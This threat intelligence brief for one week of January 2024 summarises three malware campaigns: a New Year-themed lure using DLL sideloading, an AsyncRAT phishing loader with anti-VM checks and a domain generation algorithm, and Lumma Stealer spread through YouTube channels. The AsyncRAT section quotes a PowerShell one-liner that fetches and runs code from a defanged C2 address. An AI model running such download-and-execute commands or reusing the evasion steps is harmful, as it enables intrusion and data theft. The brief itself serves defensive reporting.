Cyber Intel Brief: January 4 – 10, 2024

Multi-stage Intrusion Chain Uses NVIDIA Executable for DLL Sideloading to Establish C2 Communications

Multi-Stage Intrusion Chain – Command & Control Communication – MSHTA – DLL Sideloading – NVIDIA NVS and Quadro Desktop Management Utility – Industries/All

Threat Analysis

At the beginning of 2024, Cyble identified a ZIP archive file named “happy new year.zip” on VirusTotal. The ZIP archive is themed around a New Year’s greeting. Their analysis revealed that this ZIP archive executes a complex multi-stage malware intrusion chain. The chain unfolds through a series of stages, each meticulously designed to further the malware’s reach while maintaining a facade of legitimacy.

The infection begins with a ZIP archive named “happy new year.zip.” This file, themed around the New Year, contains a shortcut LNK file disguised as a PNG image. This initial stage is crucial for initiating the intrusion chain, as it relies on social engineering to deceive the user into executing the file. 

When the user interacts with the disguised image, it triggers the execution of an embedded JavaScript code via MSHTA. This script is the first active component of the intrusion chain, initiating the download of further malicious components. The JavaScript code downloads a certificate file masquerading as a JPG image containing base64 encoded data. This data, when decoded, reveals a CAB archive file that houses the malware executable.

The CAB file is expanded, saving it as an executable file (winp.exe), which, when executed, drops two binary files and then employs cmd.exe to copy the contents of these two files, combining them into a malicious DLL file (nView.dll). Then, it generates two more binary files, employing cmd.exe to merge their content into a legitimate executable file (nvTaskBar.exe). winp.exe also establishes persistence by creating a scheduled task named “ToSestsc,” which is set to run every 10 minutes. Upon start, this task executes the nvTaskBar.exe. 

The intrusion chain employs DLL sideloading, a technique used to bypass security measures to establish a connection with a Command-and-Control (C2) server. In this case, the legitimate executable (nvTaskbar.exe) loads the malicious DLL nView.dll. Following the loading of the nView.dll, it then drops and loads an additional malicious DLL named NVDriverSearch.ct. During execution, this DLL connects to the C2 server.

The C2 server is responsible for issuing commands, receiving data, and potentially delivering additional payloads to the infected system. The malware utilizes port 443, commonly used for secure web traffic, which can help evade network-based detection systems.

Community comments on VirusTotal, dating a year ago, state that the C2s IP address was previously associated with the Remcos Remote Access Trojan (RAT). Remcos RAT is known for its remote control, surveillance, and data exfiltration capabilities. If this DLL is indeed linked to Remcos RAT, it could indicate a significant risk of data theft, surveillance, and unauthorized control over the infected systems.

Analyst Note: The potential association with Remcos RAT suggests that the threat actors behind this campaign may possess remote access and surveillance capabilities. This link, if confirmed, would indicate a high risk of sensitive data compromise and extensive control over infected systems. However, it’s important to note that such associations require further investigation to confirm, as IP addresses can be reused or shared among multiple threat actors.

Risk & Impact Assessment

The multi-stage malware intrusion chain presents several risks and potential impacts. First, the social engineering tactics used for initial infiltration indicate a moderate risk of successful penetration into systems, especially in environments where user awareness is low. The subsequent stages of the malware, involving deceptive downloads and DLL sideloading, suggest a high likelihood of evading standard security measures, leading to system compromise. The connection to a C2 server elevates the risk, including further malware download, remote access, reconnaissance, and data exfiltration. These capabilities expose affected organizations to unauthorized access, data breaches, and loss of sensitive information. Additionally, the malware’s ability to potentially create backdoors and deploy payloads can lead to prolonged network compromise and increased difficulty in eradicating the threat.

Considering the potential risk associated with this malware, there is a reasonable likelihood of a material impact on a company’s business operations, results of operations, or financial condition. The potential for unauthorized access, data breaches, and loss of sensitive information can lead to substantial operational disruptions, reputational damage, and financial losses due to response costs, legal liabilities, and decreased consumer trust. Organizations must recognize the severity of this threat and implement comprehensive cybersecurity measures to mitigate these risks.

Source Material: Cyble, Festive Facade: Dissecting Multi-Stage Malware in New Year-themed Lure

Active Phishing Campaign Deploys AsyncRAT Since February, Uses Complex Evasion Tactics and DGA

Malware – Phishing Campaign – AsyncRAT – Remote Access Tool – PowerShell – Domain Generation Algorithm – Industries/Critical Infrastructure

Threat Analysis

This AsyncRAT campaign utilizes advanced obfuscation techniques and Domain Generation Algorithms (DGAs) to evade standard detection methods. The threat actors have meticulously crafted their attack vectors to use decoys and employ anti-sandboxing tactics, further complicating the analysis and mitigation efforts. The campaign is characterized by its multi-stage attack methodology, from deceptive phishing emails to the eventual deployment of the AsyncRAT payload. Throughout these stages, the campaign demonstrates high adaptability and evasion, constantly altering its tactics to stay ahead of cybersecurity defenses.

The initial infection vector employed by threat actors involves targeted phishing emails sent to select individuals in targeted companies, including those managing crucial infrastructure in the United States. These emails contained various attachments, such as PDFs and SVG files, which led to a download of a highly obfuscated JavaScript file. This JavaScript file is heavily obfuscated, making it challenging to detect by standard security measures.

Upon interaction with the phishing email, victims are directed to a specially crafted phishing website, which serves as the platform for deploying the JavaScript Loader. The phishing website automatically triggers the download or execution of a heavily obfuscated JavaScript Loader upon the victim’s visit. The JavaScript file includes several anti-sandboxing measures to elude automatic detection systems. The URL to the Command and Control (C2) server is concealed within the JavaScript code, using a ciphering method where an array of numbers is converted to ASCII characters after subtracting a constant value.

After executing the JavaScript Loader, the file executes a command to establish communication with the C2 server. This includes the use of PowerShell in a headless mode. The C2 server and URL are frequently updated to evade detection. The loader adapts to these changes and maintains contact with the control server. Upon a successful GET request, the C2 server sends a script containing base64 code, which is further unpacked and executed to drop the payload.

The JavaScript Loader employs sophisticated anti-sandboxing and anti-VM checks to evade detection by automated security systems. According to the AT&T Alien Labs document, the script uses the PowerShell command Get-MpComputerStatus | Select -ExpandProperty “IsVirtualMachine” to determine if the infected machine is a virtual machine (VM) or sandbox environment. This command checks the computer status and extracts the “IsVirtualMachine” value, which can have three possible outputs:

1. True: Indicating the machine is a virtual machine.
2. False: Indicating the machine is not a virtual machine.
3. An unspecified value, possibly representing an unknown or undetermined state.

A specific variable, $wiqnfex, is used in the command sent to the C2 server (iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”)), which holds a value representing the probability that the machine is a VM or sandbox. This variable is a 12-digit number and plays a key role in determining the course of action if a sandbox or VM is detected.

If the Command and Control (C2) server receives an answer indicating that the environment is potentially a sandbox or VM (an invalid answer), the request is redirected to a benign site like Google. This serves as a decoy, essentially leading the security analysis tools on a false path. Alternatively, the C&C server generates and sends a new script, similar to the previous ones. This script reaches out to a payload hosted on the domain temp[.]sh.

Despite the various measures taken to avoid detection, there is a consistent pattern in the use of the temp[.]sh domain across different samples over time. This consistency might offer a potential vulnerability in the otherwise sophisticated evasion tactics of the AsyncRAT loader.

When the JavaScript loader determines it is not operating in a sandbox or VM, it triggers a new set of domains. This shift is part of the campaign’s evasion and obfuscation strategy, making tracking and analysis more challenging for security researchers. Unlike earlier stages, where domains were hardcoded and part of the initial obfuscation layers, these new scripts dynamically calculate the domain using a Domain Generation Algorithm (DGA) based on the current data. This method enhances the stealthiness of the communication with the command and control (C&C) server, as it becomes difficult to predict or block these dynamically generated domains.

The DGA used in the loader is a critical component for maintaining consistent communication with the C2 servers while evading detection. Based on the AT&T Alien Labs analysis, here’s how the DGA operates:

Seed Generation:

• The DGA begins by generating a seed that is based on the day of the year. This ensures that the generated domain names are unique and change systematically over time.

Domain Generation Cycle:

• The algorithm is designed to produce a new domain every seven days, with a fresh domain specifically generated every Sunday. This regular update pattern makes it difficult for defenders to block or anticipate the next domain that the malware will use for communication.

Domain Name Creation:

• The seed generated is then used to select 15 letters, ranging from ‘a’ to ‘n’. These letters are combined to form the domain name. The choice of these specific letters is likely a part of the obfuscation strategy to create non-obvious domain names.

Risk & Impact Assessment

Given the sophisticated nature of the AsyncRAT campaign and its potential for deep network penetration, there is a reasonable likelihood of a material impact on the company’s business operations, results of operations, or financial condition. The direct consequences of a breach could include significant financial costs related to incident response, legal liabilities, and regulatory fines, especially if sensitive customer data is involved. The indirect impacts, such as reputational damage and loss of customer trust, could have lasting effects on the company’s market position and revenue streams.

Additionally, if critical systems are compromised, the disruption to business operations could be severe, potentially leading to a halt in production or service delivery. This disruption not only affects immediate revenue but could also result in long-term customer attrition. In sectors where uptime is crucial, such as finance or healthcare, the impacts could be even more pronounced. It’s important to consider that the evolving nature of the AsyncRAT campaign, with its ability to adapt and evade defenses, makes it a persistent threat that could lead to repeated breaches if not adequately addressed.

Source Material: ATT AlienVault, AsyncRAT loader: Obfuscation, DGAs, decoys and Govno

Compromised YouTube Channels Disseminate Lumma Stealer Through Multi-stage Infection Chain

Malware – Lumma Stealer – Infostealer – Process Injection – Compromised YouTube Channels – Industries/All

Threat Analysis

A recent campaign has been discovered that effectively leverages YouTube channels to distribute a variant of Lumma Stealer. The campaign strategically exploits the popularity and reach of YouTube, a platform not typically associated with the dissemination of malware, thereby broadening its potential impact.

The initial infection vector of the campaign involves compromising legitimate YouTube channels. Once these channels are under their control, the cybercriminals upload videos or modify existing ones, embedding malicious URLs in the video descriptions. These URLs are disguised as links to software or other desirable downloads, often related to gaming or productivity tools. Users are directed to download a ZIP file when they click these links. Unbeknownst to the user, this file contains a malicious payload – the Lumma Stealer malware. The simplicity of this approach, relying on the curiosity and trust of users, makes it highly effective.

Once the user downloads and opens the ZIP file, the next phase of the infection begins. This file typically contains a .NET loader (Installer-Install-2023_v0y.6.6.exe) to load and execute additional payloads. The .NET loader in this campaign is notable, employing various obfuscation techniques to evade detection by antivirus software.

Upon execution, the .NET loader triggers a PowerShell script. This script retrieves the Lumma Stealer malware from a remote server and executes it on the victim’s system. The stealthy nature of the script, combined with the obfuscated .NET loader, ensures a higher infection success rate and complicates efforts to detect and analyze the malware.

The PowerShell script, initiated by the .NET loader, reaches out to a remote server controlled by the cybercriminals. From this server, it downloads the DLL file that contains the Lumma Stealer. Once downloaded, the script injects the DLL into a legitimate process running on the victim’s system. This technique, known as process injection, is used to hide malicious activity within a trusted process, making it more difficult for security solutions to detect the presence of malware.

The DLL file contains the Lumma Stealer malware and employs anti-analysis techniques. These techniques are executed as soon as the DLL is loaded into the system’s memory, even before the primary malicious activities of the stealer commence.

The DLL performs checks to detect if it is being run in a virtual machine (VM) environment. It looks for VM artifacts such as specific process names, file paths, and hardware characteristics typical of virtualized environments. If indicators of a VM are detected, the malware alters its behavior or terminates, thereby evading analysis in controlled environments.

Concurrently, the DLL file employs anti-debugging methods. These techniques involve checking for the presence of debugging tools and environments, which are essential for dissecting and understanding malware behavior. The DLL performs checks for known debugger processes, if the active window contains remote debugger strings, and popular sandbox user names. If debugging is detected, the malware will exit.

Once Lumma Stealer is successfully injected and operational within the host system, its next critical action is establishing contact with a Command and Control (C2) server. This communication is pivotal for the functioning of the malware, as it enables the transmission of stolen data and the receipt of further instructions from the cybercriminals.

Initial communications with its C2 server occur by sending a POST request with a hardcoded User-Agent and parameter to check-in. Next, it sends another POST request with the Lumma ID and “act=receive-message.” Upon establishing a connection, Lumma Stealer begins transmitting the compressed collected data from the victim’s machine with URI “/api.” This stolen data can include credentials, cookies, browser sessions, browser history, and system information. 

The threat actor will most likely sell the stolen data, known as “stealer logs,” on various underground cybercriminal forums, typically for $10 per log. They may also have established working relationships with various cybercriminal groups, like ransomware operators and affiliates. These stealer logs contain a list of websites the user has visited, along with the website’s password and, if available, the cookie. 

Risk & Impact Assessment

This Lumma Stealer campaign could pose significant risks, primarily data theft, including sensitive personal and potentially corporate information. This theft can lead to unauthorized account access, culminating in further malicious activity, especially if corporate devices are infected or when personal devices are used for work purposes. The deceptive distribution of this malware through compromised YouTube channels likely increases its reach and impact, making it a substantial threat to individuals and organizations. The sophistication of Lumma Stealer, with its advanced evasion and persistence capabilities, heightens the risk of extended unauthorized data access, potentially leading to severe business disruptions and reputational harm.

Considering the potential material impact on a company’s operations and financial condition, the threat Lumma Stealer poses is non-trivial. A successful breach could result in significant operational disruptions, legal liabilities, and direct financial losses through recovery efforts and fraud or extortion. The long-term reputational damage resulting from such an incident could further erode customer trust and business relationships. Consequently, it is crucial for companies to continuously evolve their cybersecurity defenses to mitigate these risks effectively. Inadequate management of these threats could materially impact the company’s operational integrity, financial stability, and overall business continuity.

Source Material: Fortinet, Deceptive Cracked Software Spreads Lumma Variant on YouTube